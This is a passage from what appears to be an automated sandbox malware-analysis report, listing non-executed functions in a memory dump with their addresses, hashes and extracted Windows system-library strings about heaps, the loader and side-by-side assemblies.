                                                                                                                                                                                                                                                                                  • Opcode ID: 24db201579336381438580b9b4f19d940fb4a15b05b057415d5a3250d6801cf6
                                                                                                                                                                                                                                                                                  • Instruction ID: a3e5d5d2bd8a8ae74c139e0e13d9192c134890726bb28b652b66970ce0cb979a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24db201579336381438580b9b4f19d940fb4a15b05b057415d5a3250d6801cf6
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6B02B72C014C1C7EA00D7200708B173D0077C0304F11C811D1030280E4378C080F131

                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                  Function 05C98540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • Thread identifier, xrefs: 05CD5345
                                                                                                                                                                                                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05CD52D9
                                                                                                                                                                                                                                                                                  • Invalid debug info address of this critical section, xrefs: 05CD52C1
                                                                                                                                                                                                                                                                                  • Critical section debug info address, xrefs: 05CD522A, 05CD5339
                                                                                                                                                                                                                                                                                  • corrupted critical section, xrefs: 05CD52CD
                                                                                                                                                                                                                                                                                  • undeleted critical section in freed memory, xrefs: 05CD5236
                                                                                                                                                                                                                                                                                  • Critical section address, xrefs: 05CD5230, 05CD52C7, 05CD533F
                                                                                                                                                                                                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05CD5215, 05CD52A1, 05CD5324
                                                                                                                                                                                                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 05CD534E
                                                                                                                                                                                                                                                                                  • Address of the debug info found in the active list., xrefs: 05CD52B9, 05CD5305
                                                                                                                                                                                                                                                                                  • 8, xrefs: 05CD50EE
                                                                                                                                                                                                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05CD52ED
                                                                                                                                                                                                                                                                                  • double initialized or corrupted critical section, xrefs: 05CD5313
                                                                                                                                                                                                                                                                                  • Critical section address., xrefs: 05CD530D
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                                                                                                  • API String ID: 0-2368682639
                                                                                                                                                                                                                                                                                  • Opcode ID: 1f0f555f76ca7451df34f8a033c74642ce138e375c6acff3d0d23ec28535e4ca
                                                                                                                                                                                                                                                                                  • Instruction ID: b286212a843aa7570dc526154144f1f402387910bcca4b91e11ccb916f2c5900
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f0f555f76ca7451df34f8a033c74642ce138e375c6acff3d0d23ec28535e4ca
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2819FB1A40358AFEB20CF95C845FAEFBB5FB08B14F20492AF905B7240D775A944DB60
                                                                                                                                                                                                                                                                                  Function 05D086C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                                                                                  • API String ID: 0-2515994595
                                                                                                                                                                                                                                                                                  • Opcode ID: 1519d33937ed725a7f1bd10c1f6a49e4d9a2656cf4a68fc7c2530082920703f0
                                                                                                                                                                                                                                                                                  • Instruction ID: 561ba0c25c86554364f6b3695c3f2e4c778d91ef4c02f4a0b6ae2bb43eba56cb
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1519d33937ed725a7f1bd10c1f6a49e4d9a2656cf4a68fc7c2530082920703f0
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC51C2B16083159BD325DF18D949BABBBE8FF84254F045D2EF99983280E770D604E793
                                                                                                                                                                                                                                                                                  Function 05D0F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                                                                                                                  • API String ID: 0-2224505338
                                                                                                                                                                                                                                                                                  • Opcode ID: 0b77d3b6c96591e8a0948ef459e72cc22ec5de9e4097a1852761c87ef2a57185
                                                                                                                                                                                                                                                                                  • Instruction ID: f9737f60df1434c1b077733f213a1f151e645e0064093b8e8033337ce1e9b186
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b77d3b6c96591e8a0948ef459e72cc22ec5de9e4097a1852761c87ef2a57185
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE512636301246EFC721DF94C889F6AB7B4EF04A74F244C6AF8069B291C676DD80EA55
                                                                                                                                                                                                                                                                                  Function 05CE8633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 05CE86BD
                                                                                                                                                                                                                                                                                  • VerifierFlags, xrefs: 05CE88D0
                                                                                                                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 05CE86E7
                                                                                                                                                                                                                                                                                  • VerifierDebug, xrefs: 05CE8925
                                                                                                                                                                                                                                                                                  • VerifierDlls, xrefs: 05CE893D
                                                                                                                                                                                                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 05CE880F
                                                                                                                                                                                                                                                                                  • HandleTraces, xrefs: 05CE890F
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                                                                                  • API String ID: 0-3223716464
                                                                                                                                                                                                                                                                                  • Opcode ID: e1d5de2ec47e91d889153358673dff3e6f7e61308cc4be6e881c2e99c0f15280
                                                                                                                                                                                                                                                                                  • Instruction ID: b9aed847a0a3b7367bda17c8865b3b38750c8b0eae054d4c6d89b75c0807a3a2
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1d5de2ec47e91d889153358673dff3e6f7e61308cc4be6e881c2e99c0f15280
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1912572A447119FDB22DF689885F2ABBA9FB40714F890C1AF9416B350CB70AD04DBD2
                                                                                                                                                                                                                                                                                  Function 05C5F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                                  • API String ID: 0-523794902
                                                                                                                                                                                                                                                                                  • Opcode ID: fe01183fe02000582967f58b706d00888abafb732d0ce2d14d5d592013f2a452
                                                                                                                                                                                                                                                                                  • Instruction ID: b452bbdb6134819025bd8111a7135504392f0299bf145da6799a71bf02cacdde
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe01183fe02000582967f58b706d00888abafb732d0ce2d14d5d592013f2a452
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6442FFB12083819FD719CF68C488B6ABBE6FF84614F044D6DE896CB351D770DA81CB66
                                                                                                                                                                                                                                                                                  Function 05C7B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-122214566
                                                                                                                                                                                                                                                                                  • Opcode ID: 31f125db958b80e03b5e71dad1473f164d071734026e727246e40161516f0c05
                                                                                                                                                                                                                                                                                  • Instruction ID: 8377986fa091d652b02c5b9a2769fc92ad2fb13f8624deb6ab3b3c7e740282a3
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31f125db958b80e03b5e71dad1473f164d071734026e727246e40161516f0c05
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91C13931B0521DABCB15CB69C899B7FBBA5BF45708F144CA9E8039B690EB74DD84C390
                                                                                                                                                                                                                                                                                  Function 05C5640D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • apphelp.dll, xrefs: 05C56446
                                                                                                                                                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 05CB9790
                                                                                                                                                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05CB97B9
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05CB97A0, 05CB97C9
                                                                                                                                                                                                                                                                                  • LdrpInitShimEngine, xrefs: 05CB9783, 05CB9796, 05CB97BF
                                                                                                                                                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 05CB977C
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-204845295
                                                                                                                                                                                                                                                                                  • Opcode ID: 434df495854e8da5a0524059261f873fd7ebab0564750631994c6d8c095ffb38
                                                                                                                                                                                                                                                                                  • Instruction ID: d9585399205d3f479ac3f038d2d6e03c891e521229622d6a743f8085399c39be
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 434df495854e8da5a0524059261f873fd7ebab0564750631994c6d8c095ffb38
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F451E6716483049FE320DF28D896FABBBE9FF84754F400D1AFA8597250DA70D980DB92
                                                                                                                                                                                                                                                                                  Function 05C9C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 05CD7F7B
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 05CD7F8C, 05CD8000
                                                                                                                                                                                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 05CD7F82, 05CD7FF6
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05C9C5E3
                                                                                                                                                                                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 05CD7FF0
                                                                                                                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 05C9C5E4
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-475462383
                                                                                                                                                                                                                                                                                  • Opcode ID: 59ff8633d4862fa87d8d88722db11c60276c398430caf13413aa50f15109bf2b
                                                                                                                                                                                                                                                                                  • Instruction ID: 32335a0e6b43e04231025a4b8cb21c29010f472bcb6b4f182d7dcb0cf88b7f51
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59ff8633d4862fa87d8d88722db11c60276c398430caf13413aa50f15109bf2b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF31E6717047429BC314EF28D84EE2ABBD4EF84B14F040D69F945AB391DA60DD05DBA2
                                                                                                                                                                                                                                                                                  Function 05C92594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 05CD1FA9
                                                                                                                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05CD1F82
                                                                                                                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 05CD1FC9
                                                                                                                                                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 05CD1F6A, 05CD1FA4, 05CD1FC4
                                                                                                                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05CD1F8A
                                                                                                                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 05CD1F6F
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                                                                                                                                                  • Opcode ID: a6270ac403c14f3b157836434011364251e3a210b40a105cf70c8accfd21fe90
                                                                                                                                                                                                                                                                                  • Instruction ID: bc4636ad20c4d3b34fbda63a8f52b635e8672a3c48960b79a67bb445f61da29c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6270ac403c14f3b157836434011364251e3a210b40a105cf70c8accfd21fe90
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02310A7AF042147BEB248A869C49F6BF7A9EB40A50F094C65BA01B7245C370EF01DBE0
                                                                                                                                                                                                                                                                                  Function 05C8510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 05C8519B
                                                                                                                                                                                                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 05C85167
                                                                                                                                                                                                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 05C8534B
                                                                                                                                                                                                                                                                                  • WindowsExcludedProcs, xrefs: 05C8514A
                                                                                                                                                                                                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 05C85272
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                                                                                                  • API String ID: 0-258546922
                                                                                                                                                                                                                                                                                  • Opcode ID: 08d12210426beeab64d2bb74e4221dbff4a073cf14f18632c092a7c00105636e
                                                                                                                                                                                                                                                                                  • Instruction ID: 4b51233b926125bfe3b880778a1aa2c011a9debb5a115a51ad6b4dff6a97e562
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08d12210426beeab64d2bb74e4221dbff4a073cf14f18632c092a7c00105636e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8F14E72E04219EFCF11EF99C985EEEBBB9FF48614F54486AE501A7210D7B09E01DB90
                                                                                                                                                                                                                                                                                  Function 05C8D6D0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-1975516107
                                                                                                                                                                                                                                                                                  • Opcode ID: 1f198792baca12c9954d693073dd4f3ef93fdc2887c1a47927abd286e1ed62fb
                                                                                                                                                                                                                                                                                  • Instruction ID: c40d4194b2db41e63c3b49222793a7db36f5651006e5c0c1479d8ebad4d3f752
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f198792baca12c9954d693073dd4f3ef93fdc2887c1a47927abd286e1ed62fb
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD51D371A047459FDB14EF68D489BADBFB2BF44318F14485AE4026B3C1DB71AA85CBD0
                                                                                                                                                                                                                                                                                  Function 05C57662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                                                                                                                                  • API String ID: 0-3061284088
                                                                                                                                                                                                                                                                                  • Opcode ID: a22241671973b8a39a7f3cf7f9b090e4f319fb48f45d842066ee01c9eb94f4d2
                                                                                                                                                                                                                                                                                  • Instruction ID: 722c5f0ef4bc2e0cee6ff843707a421b26cc9c811e7f838d5de8b499b3bae485
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a22241671973b8a39a7f3cf7f9b090e4f319fb48f45d842066ee01c9eb94f4d2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5014C32215284AEE31993B9E80FF967FE4EB41B34F144C5AF44547690CEE99DC0F194
                                                                                                                                                                                                                                                                                  Function 05C9265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 05CD20C0
                                                                                                                                                                                                                                                                                  • .Local, xrefs: 05C927F8
                                                                                                                                                                                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 05CD1FE3, 05CD20BB
                                                                                                                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 05CD1FE8
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                                                                                                  • API String ID: 0-1239276146
                                                                                                                                                                                                                                                                                  • Opcode ID: 59901d111660ef109f35844c3fbe4430716dd14b9f00feb8da8f9db0c25a8050
